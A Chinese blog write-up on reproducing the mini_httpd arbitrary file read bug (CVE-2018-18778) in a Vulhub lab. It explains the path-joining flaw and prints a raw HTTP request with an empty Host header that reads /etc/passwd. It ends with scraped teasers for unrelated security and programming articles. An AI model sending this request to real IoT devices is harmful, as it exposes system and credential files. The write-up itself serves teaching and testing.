利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

2023-11-07

Vulnhub官方复现教程

https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/

漏洞原理

Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。

在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

见上述代码,分析如下:

  • 当HOST=example.com、FILE=index.html的时候,上述语句结果为example.com/index.html,文件正常读取。
  • 当HOST为空、FILE=etc/passwd的时候,上述语句结果为/etc/passwd

后者被作为绝对路径,于是读取到了/etc/passwd,造成任意文件读取漏洞。

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/mini_httpd/CVE-2018-18778

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:3分钟
环境启动后,访问http://your-ip:8080即可看到Web页面。
我的是这样,不知道算不算有错
在这里插入图片描述

端口设置

浏览器设置

以火狐浏览器FireFox为例,在选项常规网络设置设置,将连接手动代理配置HTTP代理,填写127.0.0.1,端口为8080
在这里插入图片描述

BurpSuit设置

ProxyOptionsProxy Listeners编辑监听端口为8080
在这里插入图片描述
并将ProxyIntercept点击成Intercept is on

漏洞复现

发送请求是将Host置空,PATH的值是文件绝对路径:

GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

成功读取文件:
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778) 的相关文章

  • Frp某场景下实现多层代理

    注 由于传播 利用本文章所提供的信息而造成的任何直接或者间接的后果及损失 均由使用者本人负责 本文作者不为此承担任何责任 一旦造成后果请自行承担 目录 frp简介 部分配置参数说明 实验场景 实验场景 实验环境 实验步骤 第一层隧道 第二层
  • Sqlmap使用-盲注小实验

    目录 sqlmap简介 基本格式 sqlmap详细命令 Options 选项 Target 目标 Request 请求 Enumeration 枚举 Optimization 优化 Injection 注入 Detection 检测 Tec
  • vulnhub靶场Matrix-Breakout 2 Morpheus教程

    靶场搭建 靶机下载地址 Matrix Breakout 2 Morpheus VulnHub 直接解压双击ova文件即可 使用软件 VMware 可能会出现问题 VirtualBox 此处官方建议使用VirtualBox 难度 中等 攻击机
  • 跨站请求伪造CSRF(Cross-site request forgery)

    目录 一 什么是CSRF 二 可能存在CSRF攻击的三个条件 一个相关的动作 基于 Cookie 的会话处理 没有不可预测的请求参数 二 常见的CSRF攻击 1 CSRF令牌的验证取决与请求方法 2 CSRF令牌的验证取决与令牌是否存在 3
  • Kioptrix Level 2-writeup

    Kioptrix Level 2 writeup 0x00 信息收集 目标机器 16 16 16 178 kali攻击机 16 16 16 177 使用nmap来个端口服务扫描 浏览器打开http 16 16 16 178看看 第一眼看上去
  • 利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

    Apache Log4j Server 反序列化命令执行漏洞 CVE 2017 5645 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 payload 检测 Vulnhub官方复现教程 https vulhub org
  • DVWA-XSS 级别通关详解(图文详细)

    目录 DVWA XSS 级别通关详解 low级别 1 反射性xss 2 存储型xss 3 DOM型xss Medium级别 1 反射型xss 2 存储型xss 3 DOM型xss hight级别 1 反射型xss 2 存储型xss 3 DO
  • vulnhub blogger: 1

    渗透思路 nmap扫描端口 gobuster扫描网站目录 wpscan发现wordpress漏洞插件 利用插件wpdiscuz的未授权的任意文件上传漏洞 CVE 2020 24186 getshell 弱密码提权 环境信息 靶机 192 1
  • SSTI模板注入

    SSTI模板注入 探测 识别 利用 Smarty Twig 1 x twig2 x 3 x jinja2 探测 使用
  • kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)

    平台及工具 linux kali平台 aircrack ng 工具 免驱监听网卡 详细操作 1 首先启动kali 插入网卡 输入ifconfig查看kali是否检测到监听网卡 注意监听网卡要免驱动的 ifconfig 查看自身网卡信息 如图
  • NTLM及Kerberos认证原理摘录

    目录 NTLM 前言 认证流程 本地认证 NTLM Hash的生成 Kerberos认证 概念 认证流程 编辑Kerberos协议四个角色介绍 KDC的介绍 Kerberos认证 大体分为三个流程 Authentication Servic
  • 渗透测试 面试笔试题

    Powered By 行云博客 https www xy586 top 原创文章 转载请附上原文出处链接和本声明 原文链接 https blog csdn net qq 41679358 article details 109019491
  • Jangow

    Jangow 1 环境准备 靶场地址 https www vulnhub com entry jangow 101 754 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境 启动即可 将网段设置为NAT模式
  • 利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

    Adobe ColdFusion 反序列化漏洞 CVE 2017 3066 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 生成POC 发送POC 发送POC内容 检验POC 进入容器 通过DockerID进入容器 查看
  • 使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用

    如果管理员给予了某个普通用户tar命令的超级管理员操作 那么我们可以使用tar命令进行提权 命令如下 sudo u root tar cf dev null exploit checkpoint 1 checkpoint action ex
  • Vulnhub之Me-and-My-Girlfriend

    Vulnhub是一个很好的靶机平台 想看官网点这里 今天学习Me and My Girlfriend 点击这里下载哦 这个比较简单 入门学习 VMware和VirtualBox都可以导入 成功后如图 这里修改连接为NAT模式 然后就开始玩耍
  • CVE-2018-2894WebLogic未授权任意文件上传

    CVE 2018 2894WebLogic未授权任意文件上传 这个洞的限制就比较多了 限制版本 Oracle WebLogic Server版本 10 3 6 0 12 1 3 0 12 2 1 2 12 2 1 3 限制配置 该漏洞的影响
  • hack the box—Lame

    扫描 还是老方法nmap fscan得到开放的端口和服务 nmap sV sC sT v T4 10 10 10 3 看到开了445 先来波ms17 010 发现失败 这里还开个21 并且可以知道版本号 直接搜索ftp漏洞 msf正好有对应
  • 第二章 常用安全工具

    目录 1 Kali系统工具分类 2 Kali Top10工具 1 Kali系统工具分类 信息收集 Information Gathering 主要目的是收集渗透测试目标的基本信息 包括操作系统信息 网络配置信息 应用服务信息等 脆弱性分析
  • 手把手教你用Python轻松玩转SQL注入——渗透利器

    前言 大家好 我是黄伟 相信大家经常有听到过SQL注入啥的 但是并不是特别了解 小编以前就是经常听别人说 但是自己啥都不懂 直到后来看了相关教材后才明白 原来是这么个东西 那么到底是什么东西了 又或者是不是个东西了 我们接着往下看 一 浅谈

随机推荐

  • google 浏览器出现 ERR_PROXY_CONNECTION_FAILED 无法访问网络

    1 问题 早上来公司突然发现谷歌浏览器访问所有的东西都出现 ERR PROXY CONNECTION FAILED 网络不可用的提示 这一串的单词的意思是 代理连接失败 真的是一脸懵逼 经过一番百度后发现是网络代理作的妖 2 解决方法 其实
  • 安卓移动应用开发之从零开始写程序6

    实验六 记事本小项目的实现 一 由于项目相对来说比较中等 所以我分为两个实验来介绍给大家 本次实验实现最终效果图如下 实现除保存按钮外的按钮监听以及界面的布局文件 主界面 显示笔记的内容和编辑的时间 里面有一个添加按钮 添加笔记界面 返回按
  • The 19th Zhejiang Provincial Collegiate Programming Contest 2022浙江省赛 (A/B/C/G/L/I)

    https codeforces com gym 103687 题解在cf旁边的Tutorial那里 A JB Loves Math 本来是按照数的奇偶分类讨论 一直wa2 跑了个对拍 如果错了 可以考虑这几个样例 由于x y固定 所以只能
  • [数据库】sql 查询语句 汇总

    students表 id class id name gender score 1 1 小明 M 90 2 1 小红 F 95 class表 id name 1 一班 2 二班 3 三班 4 四班 1 基本查询 查询students表的所有
  • 解析阿里云分布式调度系统伏羲

    解析阿里云分布式调度系统伏羲 转载于 阿里云社区https yq aliyun com articles 72526 spm 5176 100240 searchblog 119 DjZ0I4 伏羲的系统架构如下图所示 整个集群包括一台Fu
  • 关于Nios II中Verify failed between address 0xxxx and

    Verifying 000xxxxx 0 Verify failed between address 0xxxxxx and 0xxxxxxLeaving target Processor paused 论坛和网络上关于这个问题问的特别多
  • ssh登录时提示「permission denied please try again」

    ssh使用root账号登录系统 提示permission denied please try again 可能导致该情况的几种原因 密码被改了 只能换其他账号登录 之后使用sudo命令执行 使用root还没打开 可以使用以下几步进行修改 使
  • Maven: Could not transfer artifact xxx from/to xxx

    1 美图 2 背景 遇到这个问题 Could not transfer artifact xxx from to xxx 暂时还没解决 解决后 会补上 Maven报错 Could not transfer artifact xxx from
  • float(“inf“)、float(“-inf“)

    一 python里如何表示正负无穷 正无穷 float inf 负无穷 float inf 二 用inf做简单加 乘算术运算会得到inf print 1 float inf inf print 2 float inf inf 三 除了inf
  • python线性表

    顺序表 顺序表 将元素顺序地存放在一块连续的存储区里 元素间的顺序关系由它们的存储顺序自然表示 数据元素本身连续存储 每个元素所占的存储单元大小固定相同 元素的下标是其逻辑地址 而元素存储的物理地址 实际内存地址 可以通过存储区的起始地址L
  • 山石网科国产化入侵防御系统,打造全生命周期的安全防护

    随着互联网的普及和网络安全的威胁日益增加 botnet感染成为了企业面临的重要问题之一 botnet是一种由分散的客户端 或肉鸡 组成的网络 这些客户端被植入了bot程序 受控于攻击者 攻击者通过这些客户端的bot程序 利用C C服务器对这
  • 指数分布的定义形式及应用

    转载请注明出处 http blog csdn net ningyaliuhebei article details 46409941 指数分布是连续型随机变量 指数分布具有无记忆性 指数分布是特殊的gamma分布 指数分布 Exponent
  • python主流web框架识别

    想学习web框架 又想熟悉python 问题来了 有没有极简的数据来支撑快速开发 特来研究 不能去研究几十个 没时间 研究主流的即可 Django Tornado Flask Twisted 所谓网络框架是指这样的一组Python包 它能够
  • 树组件根节点+叶节点渲染

    本人使用的是eleme的树组件进行的数据渲染 Element The world s most popular Vue UI frameworkElement 一套为开发者 设计师和产品经理准备的基于 Vue 2 0 的桌面端组件库http
  • 进阶题解:反转链表

    入门级题解 https blog csdn net m0 46663240 article details 122602996 一刷代码随想录 再次遇到这个反转链表 当时可是难到我了 现在做还是比较轻松的 思路及关键点 1 有两部分 一部分
  • ROS入门四 服务中的Server和Client

    服务中的Server和Client 简介 使用 spawn服务写一个客户端程序创建一只新海龟 服务模型 创建turtle spawn cpp 配置CMakeLists txt中的编译规则 编译并运行 总结流程 创建一个服务接受client消
  • 数学建模——仓内拣货优化问题

    仓内拣货优化问题 求解 某电商公司客户订单下达仓库后 商品开始下架出库 出库主要包含5 个流程如图1所示 定位 仓库有多个货架 每个货架有多个货格 商品摆放在货格中 且每个货格最多摆放一种商品 商品可以摆放在多个货格 订单下达仓库后 定位操
  • springboot有关type-aliases-package设置,xml别名爆红错误

    在application yaml中设置 mybatis mapperLocations classpath mapper xml type aliases package com chan springcloud entities 但xm
  • 【CSS】动态背景1

    效果 代码
  • 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

    mini httpd任意文件读取漏洞 CVE 2018 18778 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 漏洞复现 Vulnhub官方复现教程 https vulhub org